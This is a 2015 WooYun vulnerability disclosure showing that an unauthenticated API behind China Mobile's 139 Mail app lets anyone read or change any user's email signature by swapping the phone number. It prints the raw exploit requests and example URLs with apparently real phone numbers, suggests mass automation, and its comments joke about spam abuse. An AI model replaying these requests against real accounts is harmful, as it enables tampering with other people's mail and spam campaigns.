当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113490

漏洞标题:139邮箱app可查看并设置任意用户邮件签名(可自动批量修改)

相关厂商:中国移动

漏洞作者: 小手冰凉

提交时间:2015-05-11 19:33

修复时间:2015-06-29 16:08

公开时间:2015-06-29 16:08

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-11: 细节已通知厂商并且等待厂商处理中
2015-05-15: 厂商已经确认,细节仅向厂商公开
2015-05-25: 细节向核心白帽子及相关领域专家公开
2015-06-04: 细节向普通白帽子公开
2015-06-14: 细节向实习白帽子公开
2015-06-29: 细节向公众公开

简要描述:

139邮箱app可设置任意用户签名
用来发广告效果肯定好

详细说明:

手机登陆139邮箱app,抓取到如下数据包

GET /peStatistics/clientInterface/user/settings/<手机号>HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.1; Custom Phone - 4.1.1 - API 16 - 768x1280 Build/JRO03S)
Host: www.gdleadtone.com
Connection: Keep-Alive
Accept-Encoding: gzip


返回数据中是一串base64编码的用户邮件签名。观察数据包发现完全没有包含类似token这样的认证字段,也就是可以查看任意人的邮件签名。
例子

http://www.gdleadtone.com/peStatistics/clientInterface/user/settings/13905247273
http://www.gdleadtone.com/peStatistics/clientInterface/user/settings/13905246932
http://www.gdleadtone.com/peStatistics/clientInterface/user/settings/13905244566
http://www.gdleadtone.com/peStatistics/clientInterface/user/settings/13905241987
http://www.gdleadtone.com/peStatistics/clientInterface/user/settings/13905242001


同样在保存邮件签名设置时抓到如下数据包

POST /peStatistics/clientInterface/user/settings/save HTTP/1.1
Content-Length: 342
Content-Type: application/x-www-form-urlencoded
Host: www.gdleadtone.com
Connection: Keep-Alive
Accept-Encoding: gzip
mobileNum=<手机号>&settingString=NQclQmCFz000000YlLsiAM1DmgtifLlcoYzI3rz923Q0VMmSXrbyTJtEnzO10%2FtmIoXXMkBAYMc9tfpwRdP7ZiKF1zJMeKnf8sPtVPaP15fB%2BUhlzb3e83lBy1QubzQDqDYXKxhJmvjt5s21tk%2F7syTpNK59adkK7%2Fbbsh7yRbYcmmPZvBk4Tsex803w3okFp%2FyK4tOb7RYZovw8SsDMFkr0nRun03HUO7fbAHM7XVH%2BH2xhVLQA%2FRTNLjEdnfpLqXorBBLqodnr8X5n%2B3svlInq8yUQ%3D%3D


不难发现就是设置用户签名的接口。修改手机号能够设置任意用户邮件签名。
ps:这个网站<www.gdleadtone.com>很神奇,刚开通139邮箱的时候是查询不到签名的,需要等大约十几分钟,可能是从139的数据库同步过来的。

漏洞证明:

刚登录时,这是默认的用户签名

捕获.PNG


然后提交如下数据包

POST /peStatistics/clientInterface/user/settings/save HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.1; Custom Phone - 4.1.1 - API 16 - 768x1280 Build/JRO03S)
Host: www.gdleadtone.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 212
mobileNum=<我的手机号>&settingString=NQclQmCFzYlLsiAM1DmgtifLlcoYzI3r8ccS0sBNV2l1jXW62j5AIF0%2FtmIoXXMkBAYMc9tfpwRdP7ZiKF1zJGOS9rdYriugxzAMKK3PEznb3e83lBy1QvIo4hUZr5h3S7PvYfyfmQbb3e83lBy1Ql4kZ3wzsMvbVhuDDamnMa0%3D


然后在重新登录邮箱

捕获.PNG

签名已经被修改。
这个过程完全可以自动化,遍历手机号,修改签名........

修复方案:

这个www.gdleadtone.com网站肯定还存在很多类似的非认证的接口,添加认证

版权声明:转载请注明来源 小手冰凉@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-05-15 16:07

厂商回复:

CNVD未直接复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-11 19:44 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    发10086试试

  2. 2015-05-11 19:44 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    手里放了快一年了,擦,还是被提交了!

  3. 2015-05-11 19:47 | 小手冰凉 ( 普通白帽子 | Rank:174 漏洞数:18 | 幸福你我他)

    @px1624 ........为啥留着,除了发广告啥用啊

  4. 2015-05-11 19:50 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @小手冰凉 @px1624 哈哈

  5. 2015-05-11 20:52 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @小手冰凉 留着肯定不止发广告,看来你还没完全发现这点的问题

  6. 2015-05-11 22:04 | 小手冰凉 ( 普通白帽子 | Rank:174 漏洞数:18 | 幸福你我他)

    @px1624 是啊 求带